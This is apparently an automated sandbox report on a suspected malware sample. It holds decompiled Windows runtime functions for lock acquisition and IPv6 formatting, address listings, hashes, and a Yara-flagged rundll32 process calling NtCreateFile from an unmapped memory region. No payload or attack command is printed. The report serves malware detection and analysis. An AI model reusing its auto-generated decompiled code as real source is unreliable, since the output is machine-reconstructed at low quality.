                                                                                                                                                    0x00ca1424
                                                                                                                                                    0x00ca1424
                                                                                                                                                    0x00ca1424
                                                                                                                                                    0x00ca1427
                                                                                                                                                    0x00ca142b
                                                                                                                                                    0x00ca142c
                                                                                                                                                    0x00ca142c
                                                                                                                                                    0x00ca142c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00ca141c
                                                                                                                                                    0x00ca1411

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                    • API String ID: 48624451-2108815105
                                                                                                                                                    • Opcode ID: 06fbfc1847bc87bcea8409bc5981f579218720b16fd7d024548130532b447c0d
                                                                                                                                                    • Instruction ID: b87914ceb273a23197d4c5b6777e23d351d5be9a4b8780b35da8e0f60b0b3ed3
                                                                                                                                                    • Opcode Fuzzy Hash: 06fbfc1847bc87bcea8409bc5981f579218720b16fd7d024548130532b447c0d
                                                                                                                                                    • Instruction Fuzzy Hash: 0F6106B1904656BACF34DF9DC8808BEBBB5EF9A304B18C12DF8E647541D234AB40DB60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00CA0554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 49%
                                                                                                                                                    			E00CA0554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00d401c0;
									_push(_t144);
									_push(0);
									_t51 = E00C5F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = L00CA4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									L00CB3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									L00CB3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E00CE217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									L00CB3F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									L00CA3915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00d401c0;
												_push(_t138);
												_push(0);
												_t58 = E00C5F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = L00CA4FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												L00CB3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												L00CB3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E00CE217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												L00CB3F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												L00CA3915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00C85384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = L00C5F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														L00CA3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = L00C5F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															L00CA3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = L00C5F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = L00CA3915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L58;
																}
																E00C85329(_t110, _t138);
																return E00C853A5(_t138, 1);
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L58;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L58;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L58;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L58:
			}



































                                                                                                                                                    0x00ca055a
                                                                                                                                                    0x00ca055d
                                                                                                                                                    0x00ca0563
                                                                                                                                                    0x00ca0566
                                                                                                                                                    0x00ca05d8
                                                                                                                                                    0x00ca05e2
                                                                                                                                                    0x00ca05e5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00ca05e7
                                                                                                                                                    0x00ca05e7
                                                                                                                                                    0x00ca05ea
                                                                                                                                                    0x00ca05f3
                                                                                                                                                    0x00ca05f3
                                                                                                                                                    0x00ca0568
                                                                                                                                                    0x00ca0568
                                                                                                                                                    0x00ca0568
                                                                                                                                                    0x00ca0569
                                                                                                                                                    0x00ca0569
                                                                                                                                                    0x00ca0569
                                                                                                                                                    0x00ca056b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc217f
                                                                                                                                                    0x00cc2183
                                                                                                                                                    0x00cc225b
                                                                                                                                                    0x00cc225f
                                                                                                                                                    0x00cc2189
                                                                                                                                                    0x00cc218c
                                                                                                                                                    0x00cc218f
                                                                                                                                                    0x00cc2194
                                                                                                                                                    0x00cc2199
                                                                                                                                                    0x00cc219d
                                                                                                                                                    0x00cc21a0
                                                                                                                                                    0x00cc21a2
                                                                                                                                                    0x00cc21ce
                                                                                                                                                    0x00cc21ce
                                                                                                                                                    0x00cc21ce
                                                                                                                                                    0x00cc21d0
                                                                                                                                                    0x00cc21d6
                                                                                                                                                    0x00cc21de
                                                                                                                                                    0x00cc21e2
                                                                                                                                                    0x00cc21e8
                                                                                                                                                    0x00cc21e9
                                                                                                                                                    0x00cc21ec
                                                                                                                                                    0x00cc21f1
                                                                                                                                                    0x00cc21f6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc21f8
                                                                                                                                                    0x00cc21fb
                                                                                                                                                    0x00cc2206
                                                                                                                                                    0x00cc220b
                                                                                                                                                    0x00cc220c
                                                                                                                                                    0x00cc2217
                                                                                                                                                    0x00cc2226
                                                                                                                                                    0x00cc222b
                                                                                                                                                    0x00cc222c
                                                                                                                                                    0x00cc222f
                                                                                                                                                    0x00cc2232
                                                                                                                                                    0x00cc2235
                                                                                                                                                    0x00cc2235
                                                                                                                                                    0x00cc223a
                                                                                                                                                    0x00cc223f
                                                                                                                                                    0x00cc2241
                                                                                                                                                    0x00cc2243
                                                                                                                                                    0x00cc2248
                                                                                                                                                    0x00cc2248
                                                                                                                                                    0x00cc224d
                                                                                                                                                    0x00cc224f
                                                                                                                                                    0x00cc2262
                                                                                                                                                    0x00cc2263
                                                                                                                                                    0x00cc2268
                                                                                                                                                    0x00cc2269
                                                                                                                                                    0x00cc2269
                                                                                                                                                    0x00cc2269
                                                                                                                                                    0x00cc226d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc2276
                                                                                                                                                    0x00cc2279
                                                                                                                                                    0x00cc227e
                                                                                                                                                    0x00cc2283
                                                                                                                                                    0x00cc2287
                                                                                                                                                    0x00cc228a
                                                                                                                                                    0x00cc228d
                                                                                                                                                    0x00cc228f
                                                                                                                                                    0x00cc22bc
                                                                                                                                                    0x00cc22bc
                                                                                                                                                    0x00cc22bc
                                                                                                                                                    0x00cc22be
                                                                                                                                                    0x00cc22c4
                                                                                                                                                    0x00cc22cc
                                                                                                                                                    0x00cc22d0
                                                                                                                                                    0x00cc22d6
                                                                                                                                                    0x00cc22d7
                                                                                                                                                    0x00cc22da
                                                                                                                                                    0x00cc22df
                                                                                                                                                    0x00cc22e4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc22e6
                                                                                                                                                    0x00cc22e9
                                                                                                                                                    0x00cc22f4
                                                                                                                                                    0x00cc22f9
                                                                                                                                                    0x00cc22fa
                                                                                                                                                    0x00cc2305
                                                                                                                                                    0x00cc2314
                                                                                                                                                    0x00cc2319
                                                                                                                                                    0x00cc231a
                                                                                                                                                    0x00cc231d
                                                                                                                                                    0x00cc2320
                                                                                                                                                    0x00cc2323
                                                                                                                                                    0x00cc2323
                                                                                                                                                    0x00cc2328
                                                                                                                                                    0x00cc232d
                                                                                                                                                    0x00cc232f
                                                                                                                                                    0x00cc2331
                                                                                                                                                    0x00cc2336
                                                                                                                                                    0x00cc2336
                                                                                                                                                    0x00cc233b
                                                                                                                                                    0x00cc233d
                                                                                                                                                    0x00cc2350
                                                                                                                                                    0x00cc2351
                                                                                                                                                    0x00cc2356
                                                                                                                                                    0x00cc2359
                                                                                                                                                    0x00cc2359
                                                                                                                                                    0x00cc235b
                                                                                                                                                    0x00cc235d
                                                                                                                                                    0x00c85367
                                                                                                                                                    0x00c8536b
                                                                                                                                                    0x00c85372
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc2363
                                                                                                                                                    0x00cc2363
                                                                                                                                                    0x00cc2369
                                                                                                                                                    0x00cc236a
                                                                                                                                                    0x00cc236c
                                                                                                                                                    0x00cc2371
                                                                                                                                                    0x00cc2373
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc2379
                                                                                                                                                    0x00cc2379
                                                                                                                                                    0x00cc237a
                                                                                                                                                    0x00cc237f
                                                                                                                                                    0x00cc237f
                                                                                                                                                    0x00cc2385
                                                                                                                                                    0x00cc2386
                                                                                                                                                    0x00cc2389
                                                                                                                                                    0x00cc238e
                                                                                                                                                    0x00cc2390
                                                                                                                                                    0x00c85378
                                                                                                                                                    0x00c8537c
                                                                                                                                                    0x00cc2396
                                                                                                                                                    0x00cc2396
                                                                                                                                                    0x00cc2397
                                                                                                                                                    0x00cc239c
                                                                                                                                                    0x00cc23a2
                                                                                                                                                    0x00cc23a3
                                                                                                                                                    0x00cc23a6
                                                                                                                                                    0x00cc23ab
                                                                                                                                                    0x00cc23ad
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc23b3
                                                                                                                                                    0x00cc23b3
                                                                                                                                                    0x00cc23b4
                                                                                                                                                    0x00cc23b9
                                                                                                                                                    0x00cc23ba
                                                                                                                                                    0x00cc23ba
                                                                                                                                                    0x00cc23bc
                                                                                                                                                    0x00cc23bf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cb9153
                                                                                                                                                    0x00cb9158
                                                                                                                                                    0x00cb915a
                                                                                                                                                    0x00cb915e
                                                                                                                                                    0x00cb9160
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cb9166
                                                                                                                                                    0x00cb9166
                                                                                                                                                    0x00cb9171
                                                                                                                                                    0x00cb9176
                                                                                                                                                    0x00cb9176
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cb9160
                                                                                                                                                    0x00cc23c6
                                                                                                                                                    0x00cc23d7
                                                                                                                                                    0x00cc23d7
                                                                                                                                                    0x00cc23ad
                                                                                                                                                    0x00cc2390
                                                                                                                                                    0x00cc2373
                                                                                                                                                    0x00cc233f
                                                                                                                                                    0x00cc233f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc233f
                                                                                                                                                    0x00cc2291
                                                                                                                                                    0x00cc2291
                                                                                                                                                    0x00cc2293
                                                                                                                                                    0x00cc2295
                                                                                                                                                    0x00cc229a
                                                                                                                                                    0x00cc22a1
                                                                                                                                                    0x00cc22a3
                                                                                                                                                    0x00cc22a7
                                                                                                                                                    0x00cc22a9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc22ab
                                                                                                                                                    0x00cc22ad
                                                                                                                                                    0x00cc22af
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc22af
                                                                                                                                                    0x00cc22b1
                                                                                                                                                    0x00cc22b4
                                                                                                                                                    0x00cc22b4
                                                                                                                                                    0x00cc22b6
                                                                                                                                                    0x00c853be
                                                                                                                                                    0x00c853be
                                                                                                                                                    0x00c853be
                                                                                                                                                    0x00c853c0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c853cb
                                                                                                                                                    0x00c853ce
                                                                                                                                                    0x00c853d0
                                                                                                                                                    0x00c853d4
                                                                                                                                                    0x00c853d6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c853d8
                                                                                                                                                    0x00c853e3
                                                                                                                                                    0x00c853ea
                                                                                                                                                    0x00c853ea
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c853d6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc22b6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc228f
                                                                                                                                                    0x00cc2349
                                                                                                                                                    0x00cc234d
                                                                                                                                                    0x00cc2251
                                                                                                                                                    0x00cc2251
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc2251
                                                                                                                                                    0x00cc21a4
                                                                                                                                                    0x00cc21a4
                                                                                                                                                    0x00cc21a6
                                                                                                                                                    0x00cc21a8
                                                                                                                                                    0x00cc21ac
                                                                                                                                                    0x00cc21b6
                                                                                                                                                    0x00cc21b8
                                                                                                                                                    0x00cc21bc
                                                                                                                                                    0x00cc21be
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc21c0
                                                                                                                                                    0x00cc21c2
                                                                                                                                                    0x00cc21c4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc21c4
                                                                                                                                                    0x00cc21c6
                                                                                                                                                    0x00cc21c6
                                                                                                                                                    0x00cc21c8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc21c8
                                                                                                                                                    0x00cc21a2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc2183
                                                                                                                                                    0x00ca057b
                                                                                                                                                    0x00ca057d
                                                                                                                                                    0x00ca0581
                                                                                                                                                    0x00ca0583
                                                                                                                                                    0x00cc2178
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00ca0589
                                                                                                                                                    0x00ca058f
                                                                                                                                                    0x00ca058f
                                                                                                                                                    0x00ca0583
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CC2206
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                    • API String ID: 885266447-4236105082
                                                                                                                                                    • Opcode ID: 953951fd0624ce2bee35236a298f02bf2e410f97e87b2090cd1eb2225c24801b
                                                                                                                                                    • Instruction ID: c3136672f4ab0e3194c33b2528c31daab632d2c50e0269dbecfc223b009ac1c4
                                                                                                                                                    • Opcode Fuzzy Hash: 953951fd0624ce2bee35236a298f02bf2e410f97e87b2090cd1eb2225c24801b
                                                                                                                                                    • Instruction Fuzzy Hash: 8C515B31B002426FEB14CE18CCC1FA633A9AF95720F25426DFD55DB286DA71ED428794
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00CA14C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ___swprintf_l.LIBCMT ref: 00CCEA22
                                                                                                                                                      • Part of subcall function 00CA13CB: ___swprintf_l.LIBCMT ref: 00CA146B
                                                                                                                                                      • Part of subcall function 00CA13CB: ___swprintf_l.LIBCMT ref: 00CA1490
                                                                                                                                                    • ___swprintf_l.LIBCMT ref: 00CA156D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                                    • String ID: %%%u$]:%u
                                                                                                                                                    • API String ID: 48624451-3050659472
                                                                                                                                                    • Opcode ID: eeb60b7a261000ca097da4b4b90df9654a8131425abb13ff50ee14f0d10b032c
                                                                                                                                                    • Instruction ID: 22297f5b861ae28b446815afeee2f6292f03b7bb00bd1a81d79512213d65094e
                                                                                                                                                    • Opcode Fuzzy Hash: eeb60b7a261000ca097da4b4b90df9654a8131425abb13ff50ee14f0d10b032c
                                                                                                                                                    • Instruction Fuzzy Hash: 9621C172D0021AAFCF21DE58CC45AEE73ACEB91714F484526FC56D3140DB70EA589BE0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00C853A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CC22F4
                                                                                                                                                    Strings
                                                                                                                                                    • RTL: Re-Waiting, xrefs: 00CC2328
                                                                                                                                                    • RTL: Resource at %p, xrefs: 00CC230B
                                                                                                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00CC22FC
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                    • API String ID: 885266447-871070163
                                                                                                                                                    • Opcode ID: da94a2f52174091fd64f3f530781d5ecd7ac90a7d6d3f98f487a922091cac638
                                                                                                                                                    • Instruction ID: 6f7c54d6de3ed7201684eff4d196e6b9c426ce51e12082da46c68bc554e5757d
                                                                                                                                                    • Opcode Fuzzy Hash: da94a2f52174091fd64f3f530781d5ecd7ac90a7d6d3f98f487a922091cac638
                                                                                                                                                    • Instruction Fuzzy Hash: D95126716007026BEB15EB28CC81FA7739CEF55364F104229FD19DB291EAB1EE4297A4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Analysis Process: rundll32.exe PID: 1688 Parent PID: 1780 rundll32.exeCOMMON

                                                                                                                                                    Executed Functions

                                                                                                                                                    Function 000B81BF, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,000B3B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,000B3B97,007A002E,00000000,00000060,00000000,00000000), ref: 000B820D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                    • String ID: .z`
                                                                                                                                                    • API String ID: 823142352-1441809116
                                                                                                                                                    • Opcode ID: 9696386f45df1b40e6d52ff727d5064550613b1301bb2db15cae2250a2c91d46
                                                                                                                                                    • Instruction ID: 06def11213038066eeac111ec7728d04a9ef91c391912f599937c133a03571d0
                                                                                                                                                    • Opcode Fuzzy Hash: 9696386f45df1b40e6d52ff727d5064550613b1301bb2db15cae2250a2c91d46
                                                                                                                                                    • Instruction Fuzzy Hash: 3401AFB2200108AFCB48CF98DC85EEB77A9AF8C354F158649FA0D97251C630E811CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 000B81C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,000B3B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,000B3B97,007A002E,00000000,00000060,00000000,00000000), ref: 000B820D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFile
